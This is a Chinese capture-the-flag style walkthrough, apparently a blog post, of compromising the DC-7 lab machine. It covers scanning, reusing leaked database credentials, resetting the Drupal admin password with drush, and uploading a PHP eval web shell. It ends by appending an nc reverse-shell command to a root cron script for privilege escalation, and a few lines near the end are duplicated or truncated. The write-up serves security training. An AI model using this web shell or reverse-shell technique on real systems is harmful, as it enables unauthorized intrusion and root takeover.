DC-7靶机

查找靶机iP

arp-scan -l

image-20230809214255154

靶机:192.168.149.146
主机:192.168.149.129

查看端口

nmap -sS -A 192.168.149.146 -p-

image-20230809214608478

登录网站

image-20230810195915662

发现没有什么信息,去作者的博客上查看,发现有配置文件

image-20230810200701823

image-20230810200721675

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
可以从中得到用户和密码

image-20230810201001866

无法登录,尝试ssh

image-20230810201617031

获取信息

image-20230810202656596

Subject: Cron <root@dc-7> /opt/scripts/backups.sh
查看文件backups.sh

image-20230810202847523

drush是一个shell接口,用于从云服务器命令行管理Drupal。
需要在 drupal web目录执行(/var/www/[drupal_folder_name])
使用 drup 更改密码运行命令(drush user-password admin --password="new_pass")

我们需要到/var/www/html/下进行修改密码
drush user-password admin --password="root"

image-20230810203750594

登录网站

image-20230810203949179

image-20230810204001355

发现在Content => Add content =>Basic page处似乎可以写shell。

image-20230810205003470

但发现Drupal 8不支持PHP代码,我们去百度搜索后发现Drupal 8后为了安全,需要将php单独作为一个模块导入。进入Extend => Install new module,输入php模块包的url。

image-20230810205131051

image-20230810204626355

image-20230814213052543

shell

上传木马

<?php @eval($_POST['123']) ?>

image-20230814212328511

蚁剑连接

image-20230814213158289

http://192.168.149.146/node/4

image-20230814213256942

连接成功

监听

image-20230814213342416

image-20230814213443917

image-20230814213457735

交互

image-20230814213551034

提权

使用find / -perm -u=s 2>/dev/null进行查找是否可以进行suid提权

image-20230814214149382

因为我们当前的用户为www-data所以我们可以使用之前root用户的定时任务进行提权

所以我们再次使用nc写个反弹命令进定时任务中

echo "nc -e /bin/bash 192.168.149.154 5555" >> /opt/scripts/backups.sh

image-20230814215155895

image-20230814220024208

-e /bin/bash 192.168.149.154 5555" >> /opt/scripts/backups.sh


[外链图片转存中...(img-sL0lG5AU-1692519607754)]

[外链图片转存中...(img-i0ZXy3gi-1692519607754)]

![image-20230814220128940](https://img-blog.csdnimg.cn/img_convert/7a1e6283717b303041dba2fa719967b4.png)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值